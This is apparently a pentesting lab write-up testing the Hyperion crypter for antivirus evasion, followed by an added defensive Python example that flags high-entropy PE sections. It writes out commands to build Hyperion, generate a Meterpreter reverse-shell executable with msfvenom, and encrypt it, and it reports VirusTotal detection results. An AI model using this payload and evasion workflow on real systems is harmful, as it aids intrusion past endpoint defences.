antivirus evasion with hyperion

hyperion is a windows PE packer that encrypts the original executable

interestingly it doesn’t store the encryption key in the new executable, it brute forces it

i used it once with success against a dated AV installation, in a pen testing lab

i was interested to see how good it is at evading modern and up-to-date antivirus

# install hyperion (requires wine, mingw)
cd /opt
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
unzip Hyperion-1.2.zip
rm Hyperion-1.2.zip
cd Hyperion-1.2
# build the crypter from source with the bundled mingw g++
wine g++.exe Src/Crypter/*.cpp -o hyperion.exe

# generate a payload to encrypt
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=process -f exe > revshell.exe

# encrypt the payload; run once with default options (no flags) and once with non-default options, as shown here
wine hyperion.exe -k -s revshell.exe hyperevshell.exe

# upload the result to virustotal
https://virustotal.com/

results
=======
default options: 40/56 detected as malicious
non-default options: 38/56 detected as malicious

even with the longest allowed key length of 16, all these antivirus engines picked it up

it seems like hyperion itself is not (sufficiently) polymorphic, so antivirus is picking up on static signature or heuristics

the other explanation would be that even with the largest key to brute force, it is still unpacking the payload ‘too fast’, and if/when it’s run in an AV sandbox for a short while, the real payload is seen. but i can rule this out, because with a key length of 16 it takes a long time to brute-force the right combination

so, hyperion doesn’t seem to be a good candidate for general purpose use against targets using up-to-date AV
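hyperion's output carries the original executable as an encrypted blob, and a high-entropy section is one of the static heuristics an AV engine can key on regardless of how long the key takes to brute force. the following is an added example, not part of this post or of hyperion itself: it walks the PE section table by hand, scores each section's entropy, and flags the ones that look encrypted, run against a constructed minimal PE. the section name `.hyp` and the 7.2 bits/byte threshold are assumptions.

```python
import math
import random
import struct

PACKED_ENTROPY_THRESHOLD = 7.2  # bits/byte; assumed cut-off, tune for your own corpus

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def section_entropies(pe: bytes) -> dict:
    """Walk the PE section table by hand and map section name -> raw-data entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                               # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                      # 40-byte section headers
    result = {}
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result

def packed_sections(pe: bytes, threshold: float = PACKED_ENTROPY_THRESHOLD) -> list:
    return [name for name, ent in section_entropies(pe).items() if ent >= threshold]

def build_sample_pe() -> bytes:
    """Constructed, non-executable PE: low-entropy '.text', seeded-random '.hyp' (hypothetical name) standing in for a crypter's payload."""
    text = b"\x90" * 1024 + b"\xcc\xc3" * 512         # entropy is exactly 1.5 bits/byte
    blob = random.Random(1234).randbytes(4096)          # reproducible "ciphertext"
    e_lfanew, nsec = 0x40, 2
    text_off = e_lfanew + 4 + 20 + 40 * nsec            # raw data follows the headers
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 0, 0x0102)  # i386, no optional header
    def sec(name, size, off):                           # IMAGE_SECTION_HEADER
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", size, 0x1000, size, off, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + sec(b".text", len(text), text_off) + sec(b".hyp", len(blob), text_off + len(text))
    return headers + text + blob
```

on a real sample, read the file bytes and call `packed_sections` on them; a section scoring near 8 bits/byte is what a static packer heuristic reacts to, whatever the key length.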

notes
=====
hyperion has the rather odd requirement of having to be run from the Hyperion-1.2 directory, because its binary references relative paths into the unpacked zipfile
